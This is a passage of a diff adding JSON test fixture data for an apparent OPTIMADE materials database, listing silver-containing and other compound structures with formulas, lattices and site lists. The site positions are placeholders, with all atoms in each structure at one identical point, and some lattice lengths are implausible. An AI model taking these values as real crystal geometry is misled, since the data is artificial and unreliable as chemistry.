0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ] + ], + "nsites": 16, + "species_at_sites": [ + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Br", + "Cl", + "Te", + "Te", + "Te", + "Te" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Br", + "chemical_symbols": [ + "Br" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Te", + "chemical_symbols": [ + "Te" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-Br-Cl-Te" + } + }, + { + "id": "mpf_259", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.377000", + "elements": [ + "Ag", + "C", + "Cl", + "N", + "O", + "S" + ], + "nelements": 6, + "elements_ratios": [ + 0.2, + 0.1, + 0.1, + 0.1, + 0.4, + 0.1 + ], + "chemical_formula_descriptive": "Ag2CSNClO4", + "chemical_formula_reduced": "Ag2CSNClO4", + "chemical_formula_anonymous": "A4B2CDEF", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 7.7673999365129625, + 0, + 0 + ], + [ + 0, + 9.869311574261594, + 0 + ], + [ + 0, + 0, + 4.715180447893034 + ] + ], + "cartesian_site_positions": [ + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ] + ], + "nsites": 10, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "Cl", + "N", + "O", + "O", + "O", + "O", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-N-O-S" + } + }, + { + "id": "mpf_272", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.380000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N" + ], + "nelements": 5, + "elements_ratios": [ + 0.08333333333333333, + 0.25, + 0.041666666666666664, + 0.5, + 0.125 + ], + "chemical_formula_descriptive": "Ag2H12C6N3Cl", + "chemical_formula_reduced": "Ag2H12C6N3Cl", + "chemical_formula_anonymous": "A12B6C3D2E", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 6.436155587878937, + 0, + 0 + ], + [ + 0, + 4.664748073818609, + 0 + ], + [ + 0, + 0, + 0.554511276982016 + ] + ], + "cartesian_site_positions": [ + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ] + ], + "nsites": 24, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "C", + "C", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N" + } + }, + { + "id": "mpf_276", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.381000", + "elements": [ + "Ag", + "C", + "H", + "N", + "O" + ], + "nelements": 5, + "elements_ratios": [ + 0.08, + 0.08, + 0.08, + 0.24, + 0.52 + ], + "chemical_formula_descriptive": "Ag2H2C2N6O13", + "chemical_formula_reduced": "Ag2H2C2N6O13", + "chemical_formula_anonymous": "A13B6C2D2E2", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 2.9527224047457192, + 0, + 0 + ], + [ + 0, + 9.517463347989763, + 0 + ], + [ + 0, + 0, + 7.304866428016529 + ] + ], + "cartesian_site_positions": [ + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ] + ], + "nsites": 25, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "N", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-H-N-O" + } + }, + { + "id": "mpf_281", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.382000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N", + "O", + "S" + ], + "nelements": 7, + "elements_ratios": [ + 0.08695652173913043, + 0.08695652173913043, + 0.043478260869565216, + 0.34782608695652173, + 0.21739130434782608, + 0.13043478260869565, + 0.08695652173913043 + ], + "chemical_formula_descriptive": "Ag2H8C2S2N5ClO3", + "chemical_formula_reduced": "Ag2H8C2S2N5ClO3", + "chemical_formula_anonymous": "A8B5C3D2E2F2G", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2419933831646812, + 0, + 0 + ], + [ + 0, + 9.07403560922435, + 0 + ], + [ + 0, + 0, + 2.5607011301206617 + ] + ], + "cartesian_site_positions": [ + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ] + ], + "nsites": 23, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "O", + "O", + "O", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N-O-S" + } + }, + { + "id": "mpf_446", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.412000", + "elements": [ + "Ag", + "Br", + "Cl", + "Hg", + "I", + "S" + ], + "nelements": 6, + "elements_ratios": [ + 0.2222222222222222, + 0.05555555555555555, + 0.1111111111111111, + 0.2777777777777778, + 0.05555555555555555, + 0.2777777777777778 + ], + "chemical_formula_descriptive": "Ag4Hg5S5IBrCl2", + "chemical_formula_reduced": "Ag4Hg5S5IBrCl2", + "chemical_formula_anonymous": "A5B5C4D2EF", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.132691156529571, + 0, + 0 + ], + [ + 0, + 1.8270015294181907, + 0 + ], + [ + 0, + 0, + 4.5549149749018225 + ] + ], + "cartesian_site_positions": [ + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ] + ], + "nsites": 18, + "species_at_sites": [ + "Ag", + "Ag", + "Ag", + "Ag", + "Br", + "Cl", + "Cl", + "Hg", + "Hg", + "Hg", + "Hg", + "Hg", + "I", + "S", + "S", + "S", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Br", + "chemical_symbols": [ + "Br" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Hg", + "chemical_symbols": [ + "Hg" + ], + "concentration": [ + 1 + ] + }, + { + "name": "I", + "chemical_symbols": [ + "I" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-Br-Cl-Hg-I-S" + } + }, + { + "id": "mpf_551", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.434000", + "elements": [ + "Ag", + "B", + "C", + "Cl", + "H", + "N", + "O", + "P" + ], + "nelements": 8, + "elements_ratios": [ + 0.013513513513513514, + 0.13513513513513514, + 0.20270270270270271, + 0.02702702702702703, + 0.5405405405405406, + 0.013513513513513514, + 0.04054054054054054, + 0.02702702702702703 + ], + "chemical_formula_descriptive": "AgB10P2H40C15NCl2O3", + "chemical_formula_reduced": "AgB10P2H40C15NCl2O3", + "chemical_formula_anonymous": "A40B15C10D3E2F2GH", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.055370731514176, + 0, + 0 + ], + [ + 0, + 4.77221883540092, + 0 + ], + [ + 0, + 0, + 5.704704278000719 + ] + ], + "cartesian_site_positions": [ + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ] + ], + "nsites": 74, + "species_at_sites": [ + "Ag", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "Cl", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "O", + "O", + "O", + "P", + "P" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "B", + "chemical_symbols": [ + "B" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "P", + "chemical_symbols": [ + "P" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-B-C-Cl-H-N-O-P" + } + }, + { + "id": "mpf_632", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.450000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N", + "O", + "S" + ], + "nelements": 7, + "elements_ratios": [ + 0.034482758620689655, + 0.10344827586206896, + 0.034482758620689655, + 0.4827586206896552, + 0.20689655172413793, + 0.034482758620689655, + 0.10344827586206896 + ], + "chemical_formula_descriptive": "AgH14C3S3N6ClO", + "chemical_formula_reduced": "AgH14C3S3N6ClO", + "chemical_formula_anonymous": "A14B6C3D3EFG", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 4.438269887249414, + 0, + 0 + ], + [ + 0, + 0.0037263506973483906, + 0 + ], + [ + 0, + 0, + 2.879535498740032 + ] + ], + "cartesian_site_positions": [ + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ] + ], + "nsites": 29, + "species_at_sites": [ + "Ag", + "C", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "N", + "O", + "S", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N-O-S" + } + }, + { + "id": "mpf_3803", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.943000", + "elements": [ + "Ba", + "Ce", + "Fe", + "H", + "Na", + "O", + "Si", + "Ti" + ], + "nelements": 8, + "elements_ratios": [ + 0.045454545454545456, + 0.045454545454545456, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.6136363636363636, + 0.18181818181818182, + 0.045454545454545456 + ], + "chemical_formula_descriptive": "Ba2NaCe2Ti2FeSi8HO27", + "chemical_formula_reduced": "Ba2NaCe2Ti2FeSi8HO27", + "chemical_formula_anonymous": 